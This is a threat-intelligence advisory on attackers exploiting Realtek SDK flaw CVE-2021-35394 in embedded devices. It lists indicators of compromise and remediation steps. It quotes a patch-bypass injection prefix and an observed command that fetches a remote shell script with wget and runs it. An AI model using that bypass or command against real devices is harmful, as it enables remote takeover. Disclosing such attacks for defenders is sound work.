March 22, 2024
Severity High Analysis Summary Ducktail Malware is a malicious program designed by hackers to infiltrate computers and networks globally. Ducktail malware is typically delivered through a […]
Rewterz Threat Alert – Remcos RAT – Fresh IOCs
August 31, 2021
Rewterz Threat Alert –Phobos Ransomware – Active IOCs
August 31, 2021
Rewterz Threat Alert – Remcos RAT – Fresh IOCs
August 31, 2021
Rewterz Threat Alert –Phobos Ransomware – Active IOCs
August 31, 2021
Severity
High
Analysis Summary
Researchers at Juniper Threat Labs have found that the threat actors are actively exploiting RealTek CVE-2021-35394 disclosed last week. The attack is specifically targets the Realtek RTL8xxx SoC chipsets that are used in embedded devices. The attack concerns a UDP server running on port 9034, that would allow the attacker to execute remote code execution of arbitrary commands. This was patched but was easily circumvented by prepending “orf;” to any injected command string:
orf;malicious_command
Exploits require only a single UDP packet from the attacker. Each observed variant of this attack follows the same steps. First, the attackers use the open UDP server to inject a shell command:
UDP Packer sent by attacker
The injected command, seen in the data field above, is:
orf;cd /tmp||cd /var&&busybox wget hxxp://45[.]61.188.184/f.sh -O b.sh&&sh b.sh;#
CVE-2021-35394
Realtek Jungle SDK could allow a remote attacker to execute arbitrary commands on the system, caused by multiple memory corruption vulnerabilities in MP Daemon diagnostic tool. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
Impact
- Machine takeover
Affected Vendors
Realtek
Indicators of Compromise
IP
- 45[.]137[.]23[.]190
- 185[.]222[.]59[.]5
- 103[.]145[.]13[.]80
- 103[.]145[.]13[.]25
SHA-256
- daef5417dd163c2d2600382a484b36f594378d909ce54e5348b0c7dd1326c57d
- 1ce6590f632d1b37c77feefe60ef632c315357ddde632c0a0aab78c69616a5b4
- 0018e361be72a44b7b38bbecfede8d571418e56d4d62a8e186991bef322a0c16
- 171961046ee6d18424cf466ad7e01096aecf48ed602d8725e6563ad8c61f1115
- 924b6aec8aa5935e27673ee96d43dd0d1b60f044383b558e3f66cd4331f17ef4
- 98fc6b2cbd04362dc10a5445c00c23c2a2cb39d24d91beab3c200f87bfd889ab
- 9bdb7d4778261bb34df931b41d32ee9188d0c7a7e10d4d68d56f6faebd047fe4
- 555ae4193c53af15bdcd82d534ed5f13fcc96c16c59b9e8072b5b122c6df8d4a
- 2bfca0726b9109ab675e6bdbe0fb81e80fbf7ee6af2f129672569e5476e57b47
Remediation
Block all threat indicators at your respective controls.
Search for IOCs in your environment.
For CVE-2021-35394 follow the link for patch.
https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/